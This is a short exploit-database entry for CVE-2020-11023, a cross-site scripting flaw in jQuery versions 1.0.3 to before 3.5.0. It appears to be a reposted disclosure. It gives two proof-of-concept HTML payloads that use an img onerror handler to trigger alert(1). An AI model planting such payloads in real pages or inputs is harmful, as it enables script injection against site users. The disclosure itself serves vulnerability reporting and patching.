Wednesday, May 5, 2021

jQuery 1.0.3 - Cross-Site Scripting (XSS)

# Exploit Title: jQuery 1.0.3 - Cross-Site Scripting (XSS)
# Date: 04/29/2020
# Exploit Author: Central InfoSec
# Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0
# CVE : CVE-2020-11023

# Proof of Concept 1:
<style><style /><img src=x onerror=alert(1)>

# Proof of Concept 2 (Only jQuery 3.x affected):
<img alt="<x" title="/><img src=x onerror=alert(1)>">
            
 

Copyright © 2020 Cyber Details - Vulnerability Database™

Thanks for everything Templateism - You should have written the code a little more complicated